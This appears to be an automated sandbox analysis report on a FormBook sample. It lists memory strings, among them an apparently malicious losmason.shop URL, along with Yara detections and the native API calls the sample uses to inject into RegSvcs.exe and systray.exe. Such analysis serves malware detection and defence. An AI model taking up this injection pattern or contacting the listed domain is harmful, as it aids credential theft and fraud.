                Source: systray.exe, 00000013.00000002.4778260554.0000000002F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: systray.exe, 00000013.00000003.2802722991.0000000007B64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: MN1qo2qaJmEvXDP.exe, rlJvZXSinaRi.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: systray.exe, 00000013.00000003.2808049665.0000000007B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: systray.exe, 00000013.00000003.2808049665.0000000007B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: systray.exe, 00000013.00000002.4782860137.00000000057D8000.00000004.10000000.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.00000000030A8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.losmason.shop/s15n/?Njld=LDTtwxbX2vi0G&Ebfx6=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.2621801367.00000000015F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.4781597517.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.4781361365.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2624347397.00000000019B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4781302763.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0042C7C3 NtClose,10_2_0042C7C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2B60 NtClose,LdrInitializeThunk,10_2_016D2B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_016D2DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_016D2C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D35C0 NtCreateMutant,LdrInitializeThunk,10_2_016D35C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D4340 NtSetContextThread,10_2_016D4340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D4650 NtSuspendThread,10_2_016D4650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2BE0 NtQueryValueKey,10_2_016D2BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2BF0 NtAllocateVirtualMemory,10_2_016D2BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2BA0 NtEnumerateValueKey,10_2_016D2BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2B80 NtQueryInformationFile,10_2_016D2B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2AF0 NtWriteFile,10_2_016D2AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2AD0 NtReadFile,10_2_016D2AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2AB0 NtWaitForSingleObject,10_2_016D2AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2D30 NtUnmapViewOfSection,10_2_016D2D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2D00 NtSetInformationFile,10_2_016D2D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2D10 NtMapViewOfSection,10_2_016D2D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2DD0 NtDelayExecution,10_2_016D2DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2DB0 NtEnumerateKey,10_2_016D2DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2C60 NtCreateKey,10_2_016D2C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2C00 NtQueryInformationProcess,10_2_016D2C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2CF0 NtOpenProcess,10_2_016D2CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2CC0 NtQueryVirtualMemory,10_2_016D2CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2CA0 NtQueryInformationToken,10_2_016D2CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2F60 NtCreateProcessEx,10_2_016D2F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2F30 NtCreateSection,10_2_016D2F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2FE0 NtCreateFile,10_2_016D2FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2FA0 NtQuerySection,10_2_016D2FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2FB0 NtResumeThread,10_2_016D2FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2F90 NtProtectVirtualMemory,10_2_016D2F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2E30 NtWriteVirtualMemory,10_2_016D2E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2EE0 NtQueueApcThread,10_2_016D2EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2EA0 NtAdjustPrivilegesToken,10_2_016D2EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D2E80 NtReadVirtualMemory,10_2_016D2E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D3010 NtOpenDirectoryObject,10_2_016D3010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D3090 NtSetValueKey,10_2_016D3090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D39B0 NtGetContextThread,10_2_016D39B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D3D70 NtOpenThread,10_2_016D3D70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D3D10 NtOpenProcessToken,10_2_016D3D10
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B14650 NtSuspendThread,LdrInitializeThunk,19_2_04B14650
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B14340 NtSetContextThread,LdrInitializeThunk,19_2_04B14340
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12CA0 NtQueryInformationToken,LdrInitializeThunk,19_2_04B12CA0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12C70 NtFreeVirtualMemory,LdrInitializeThunk,19_2_04B12C70
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12C60 NtCreateKey,LdrInitializeThunk,19_2_04B12C60
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12DF0 NtQuerySystemInformation,LdrInitializeThunk,19_2_04B12DF0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12DD0 NtDelayExecution,LdrInitializeThunk,19_2_04B12DD0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12D30 NtUnmapViewOfSection,LdrInitializeThunk,19_2_04B12D30
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12D10 NtMapViewOfSection,LdrInitializeThunk,19_2_04B12D10
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12E80 NtReadVirtualMemory,LdrInitializeThunk,19_2_04B12E80
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12EE0 NtQueueApcThread,LdrInitializeThunk,19_2_04B12EE0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12FB0 NtResumeThread,LdrInitializeThunk,19_2_04B12FB0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12FE0 NtCreateFile,LdrInitializeThunk,19_2_04B12FE0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12F30 NtCreateSection,LdrInitializeThunk,19_2_04B12F30
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12AF0 NtWriteFile,LdrInitializeThunk,19_2_04B12AF0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12AD0 NtReadFile,LdrInitializeThunk,19_2_04B12AD0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12BA0 NtEnumerateValueKey,LdrInitializeThunk,19_2_04B12BA0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12BF0 NtAllocateVirtualMemory,LdrInitializeThunk,19_2_04B12BF0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12BE0 NtQueryValueKey,LdrInitializeThunk,19_2_04B12BE0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12B60 NtClose,LdrInitializeThunk,19_2_04B12B60
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B135C0 NtCreateMutant,LdrInitializeThunk,19_2_04B135C0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B139B0 NtGetContextThread,LdrInitializeThunk,19_2_04B139B0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12CF0 NtOpenProcess,19_2_04B12CF0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12CC0 NtQueryVirtualMemory,19_2_04B12CC0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12C00 NtQueryInformationProcess,19_2_04B12C00
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12DB0 NtEnumerateKey,19_2_04B12DB0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12D00 NtSetInformationFile,19_2_04B12D00
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12EA0 NtAdjustPrivilegesToken,19_2_04B12EA0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12E30 NtWriteVirtualMemory,19_2_04B12E30
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12FA0 NtQuerySection,19_2_04B12FA0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12F90 NtProtectVirtualMemory,19_2_04B12F90
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12F60 NtCreateProcessEx,19_2_04B12F60
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12AB0 NtWaitForSingleObject,19_2_04B12AB0
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B12B80 NtQueryInformationFile,19_2_04B12B80
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B13090 NtSetValueKey,19_2_04B13090
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B13010 NtOpenDirectoryObject,19_2_04B13010
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B13D10 NtOpenProcessToken,19_2_04B13D10
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04B13D70 NtOpenThread,19_2_04B13D70
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_00AD9300 NtCreateFile,19_2_00AD9300
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_00AD9470 NtReadFile,19_2_00AD9470
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_00AD9560 NtDeleteFile,19_2_00AD9560
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_00AD9610 NtClose,19_2_00AD9610
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_00AD9770 NtAllocateVirtualMemory,19_2_00AD9770
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_009425E10_2_009425E1
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_009413F00_2_009413F0
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_00949B6C0_2_00949B6C
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_00941B6A0_2_00941B6A
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_00949CF00_2_00949CF0
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_009420300_2_00942030
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_0094A2900_2_0094A290
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_0094A2590_2_0094A259
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_009408710_2_00940871
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_009452500_2_00945250
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_009413620_2_00941362
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_009434D80_2_009434D8
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_009455DA0_2_009455DA
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_009455E80_2_009455E8
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_009457F00_2_009457F0
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_009457E00_2_009457E0
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_009439CC0_2_009439CC
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_00945A590_2_00945A59
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_00945A680_2_00945A68
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_00949CE00_2_00949CE0
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_07C883140_2_07C88314
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_07C825490_2_07C82549
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_07C825420_2_07C82542
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_07C824720_2_07C82472
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_07C823D00_2_07C823D0
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_07C823810_2_07C82381
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_07C88A680_2_07C88A68
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_094418700_2_09441870
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_0966B9200_2_0966B920
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_096698600_2_09669860
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_09669C890_2_09669C89
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_0966A0D00_2_0966A0D0
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_0966C2C00_2_0966C2C0
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_0966C2D00_2_0966C2D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004186D310_2_004186D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004168C310_2_004168C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040E0C310_2_0040E0C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004100E310_2_004100E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004168BE10_2_004168BE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004011B010_2_004011B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040E25C10_2_0040E25C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00401A0010_2_00401A00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040E20710_2_0040E207
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040E21310_2_0040E213
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00402B5010_2_00402B50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040435610_2_00404356
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0042EDF310_2_0042EDF3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040FEC310_2_0040FEC3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040269010_2_00402690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00402F3010_2_00402F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0172815810_2_01728158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169010010_2_01690100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173A11810_2_0173A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017581CC10_2_017581CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017541A210_2_017541A2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017601AA10_2_017601AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173200010_2_01732000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175A35210_2_0175A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017603E610_2_017603E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016AE3F010_2_016AE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0174027410_2_01740274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017202C010_2_017202C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A053510_2_016A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0176059110_2_01760591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175244610_2_01752446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0174442010_2_01744420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0174E4F610_2_0174E4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A077010_2_016A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C475010_2_016C4750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169C7C010_2_0169C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BC6E010_2_016BC6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B696210_2_016B6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A29A010_2_016A29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0176A9A610_2_0176A9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A284010_2_016A2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016AA84010_2_016AA840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CE8F010_2_016CE8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016868B810_2_016868B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175AB4010_2_0175AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01756BD710_2_01756BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169EA8010_2_0169EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016AAD0010_2_016AAD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173CD1F10_2_0173CD1F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169ADE010_2_0169ADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B8DBF10_2_016B8DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0C0010_2_016A0C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01690CF210_2_01690CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01740CB510_2_01740CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01714F4010_2_01714F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01742F3010_2_01742F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016E2F2810_2_016E2F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C0F3010_2_016C0F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016ACFE010_2_016ACFE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01692FC810_2_01692FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0171EFA010_2_0171EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A0E5910_2_016A0E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175EE2610_2_0175EE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175EEDB10_2_0175EEDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175CE9310_2_0175CE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B2E9010_2_016B2E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D516C10_2_016D516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168F17210_2_0168F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0176B16B10_2_0176B16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016AB1B010_2_016AB1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175F0E010_2_0175F0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017570E910_2_017570E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A70C010_2_016A70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0174F0CC10_2_0174F0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168D34C10_2_0168D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175132D10_2_0175132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016E739A10_2_016E739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017412ED10_2_017412ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BB2C010_2_016BB2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A52A010_2_016A52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175757110_2_01757571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017695C310_2_017695C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173D5B010_2_0173D5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169146010_2_01691460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175F43F10_2_0175F43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175F7B010_2_0175F7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016E563010_2_016E5630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017516CC10_2_017516CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A995010_2_016A9950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BB95010_2_016BB950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173591010_2_01735910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0170D80010_2_0170D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A38E010_2_016A38E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175FB7610_2_0175FB76
